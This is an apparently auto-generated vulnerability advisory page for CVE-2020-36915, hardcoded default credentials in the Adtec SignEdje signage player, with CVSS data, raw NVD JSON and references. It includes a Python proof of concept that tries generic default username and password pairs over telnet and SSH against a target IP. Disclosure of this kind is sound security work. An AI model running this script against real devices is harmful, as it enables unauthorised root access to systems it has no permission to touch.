Security Vulnerability Report
中文
CVE-2020-36915 CVSS 7.5 HIGH

CVE-2020-36915

Published: 2026-01-06 16:15:48
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

Adtec Digital SignEdje Digital Signage Player v2.08.28 contains multiple hardcoded default credentials that allow unauthenticated remote access to web, telnet, and SSH interfaces. Attackers can exploit these credentials to gain root-level access and execute system commands across multiple Adtec Digital product versions.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Adtec Digital SignEdje Digital Signage Player v2.08.28及更早版本
其他Adtec Digital产品受影响的版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # CVE-2020-36915 PoC - Adtec Digital SignEdje Default Credentials # Note: This is for educational and authorized testing purposes only import socket import sys import telnetlib from paramiko import SSHClient, AutoAddPolicy def check_telnet_default_credentials(target_ip, port=23): """Check for default Telnet credentials""" default_creds = [ ('admin', 'admin'), ('root', 'root'), ('admin', 'password'), ('root', 'password'), ('admin', '1234'), ('root', '12345') ] try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) result = sock.connect_ex((target_ip, port)) if result == 0: print(f"[+] Telnet port {port} is open on {target_ip}") for username, password in default_creds: try: tn = telnetlib.Telnet(target_ip, port, timeout=10) tn.read_until(b'login: ', timeout=5) tn.write(username.encode('ascii') + b'\n') tn.read_until(b'Password: ', timeout=5) tn.write(password.encode('ascii') + b'\n') result = tn.read_until(b'#', timeout=5) if b'#' in result or b'$' in result: print(f"[+] SUCCESS: Default credentials found - {username}:{password}") return True except: continue return False except Exception as e: print(f"[-] Error: {e}") return False def check_ssh_default_credentials(target_ip, port=22): """Check for default SSH credentials""" default_creds = [ ('admin', 'admin'), ('root', 'root'), ('admin', 'password') ] try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) result = sock.connect_ex((target_ip, port)) if result == 0: print(f"[+] SSH port {port} is open on {target_ip}") for username, password in default_creds: try: client = SSHClient() client.set_missing_host_key_policy(AutoAddPolicy()) client.connect(target_ip, port=port, username=username, password=password, timeout=10) print(f"[+] SUCCESS: Default SSH credentials found - {username}:{password}") return True except: continue return False except Exception as e: print(f"[-] Error: {e}") return False def main(): if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_ip>") print(f"Example: {sys.argv[0]} 192.168.1.100") sys.exit(1) target_ip = sys.argv[1] print(f"[*] Scanning {target_ip} for CVE-2020-36915 vulnerability...") check_telnet_default_credentials(target_ip) check_ssh_default_credentials(target_ip) print("[*] Scan complete") if __name__ == '__main__': main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2020-36915", "sourceIdentifier": "[email protected]", "published": "2026-01-06T16:15:47.550", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Adtec Digital SignEdje Digital Signage Player v2.08.28 contains multiple hardcoded default credentials that allow unauthenticated remote access to web, telnet, and SSH interfaces. Attackers can exploit these credentials to gain root-level access and execute system commands across multiple Adtec Digital product versions."}, {"lang": "es", "value": "Adtec Digital SignEdje Digital Signage Player v2.08.28 contiene múltiples credenciales predeterminadas codificadas que permiten acceso remoto no autenticado a las interfaces web, telnet y SSH. Los atacantes pueden explotar estas credenciales para obtener acceso a nivel de root y ejecutar comandos del sistema en múltiples versiones de productos de Adtec Digital."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-798"}, {"lang": "en", "value": "CWE-1392"}]}], "references": [{"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/190628", "source": "[email protected]"}, {"url": "https://packetstorm.news/files/id/159709", "source": "[email protected]"}, {"url": "https://www.adtecdigital.com", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/48954", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/adtec-digital-signedje-digital-signage-player-default-credentials", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5603.php", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/48954", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.